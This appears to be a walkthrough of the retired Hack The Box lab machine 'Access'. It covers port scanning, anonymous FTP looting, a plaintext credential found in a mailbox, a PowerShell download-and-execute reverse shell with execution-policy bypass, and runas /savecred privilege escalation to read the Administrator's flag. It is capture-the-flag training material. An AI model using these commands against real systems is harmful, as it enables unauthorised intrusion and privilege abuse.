This post documents the complete walkthrough of Access, a retired vulnerable VM created by egre55, and hosted at Hack The Box. If you are uncomfortable with spoilers, please stop reading now.

On this post


Access is a retired vulnerable VM from Hack The Box.

Information Gathering

Let’s start with a masscan probe to establish the open ports in the host.

# masscan -e tun0 -p1-65535,U:1-65535 --rate=1000

Starting masscan 1.0.4 ( at 2019-02-09 10:37:40 GMT
 -- forced options: -sS -Pn -n --randomize-hosts -v --send-eth
Initiating SYN Stealth Scan
Scanning 1 hosts [131070 ports/host]
Discovered open port 80/tcp on
Discovered open port 23/tcp on
Discovered open port 21/tcp on

masscan finds three open ports: 21/tcp, 23/tcp and 80/tcp. Let’s do one better with nmap scanning these discovered ports.

# nmap -n -v -Pn -p21,23,80 -A --reason -oN nmap.txt
21/tcp open  ftp     syn-ack ttl 127 Microsoft ftpd
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_Can't get directory listing: TIMEOUT
| ftp-syst:
|_  SYST: Windows_NT
23/tcp open  telnet? syn-ack ttl 127
80/tcp open  http    syn-ack ttl 127 Microsoft IIS httpd 7.5
| http-methods:
|   Supported Methods: OPTIONS TRACE GET HEAD POST
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/7.5
|_http-title: MegaCorp

Since anonymous FTP is allowed, let’s check it out first.

There’s a huge file in the Backups directory—backup.mdb. It appears to be a Microsoft Access Jet Database (MDB) file.

There’s also a big file—Access, in the Engineers directory.

The archive file is password-protected and it appears to contain a Personal Storage Table (PST) file in it.

Microsoft Office

I know there are Linux tools to read MDB and PST files but for the sake of convenience, let’s use Microsoft Office to open them. I’ll use Microsoft Access to read the MDB file. Here’s what I found in the auth_user table.

The password [email protected] is the one to extract the PST file from the archive. I’ll use Microsoft Outlook to read the PST file. There’s only one email in the mailbox.

Another credential (security:4Cc3ssC0ntr0ller) in the bag!


Let’s give the credential a shot with the Telnet service.


The file user.txt is at security’s desktop.

Privilege Escalation

Telnet is painfully slow. Let’s run a reverse shell in PowerShell. First of all, let’s write a wget script in PowerShell. Note that this system is running Windows Server 2008. As such, only PowerShell 2.0 is available. Echo the following lines to C:\Users\security\Downloads\wget.ps1.

$WebClient = New-Object System.Net.WebClient

Next, generate a reverse shell in PowerShell with msfvenom like so.

Run the following commands in the telnet session to transfer rev.ps1 over.

powershell -ExecutionPolicy Bypass -File wget.ps1 rev.ps1

Now, we can execute the reverse shell with the following command.

powershell -ExecutionPolicy Bypass -NoExit -File rev.ps1

The -NoExit switch indicates that we don’t want to exit from the thread. We should get a reverse shell in our nc listener.

During enumeration of security’s account, I ran the cmdkey command to list the stored credentials in the box and this is what I saw.

Perfect. This means that I can use the /savecred switch in runas to impersonate Administrator without knowing the password! Now, let’s claim the prize with the following command:

C:\Windows\System32\runas.exe /user:ACCESS\Administrator /savecred "C:\Windows\System32\cmd.exe /c TYPE C:\Users\Administrator\Desktop\root.txt > C:\Users\security\Downloads\root.txt"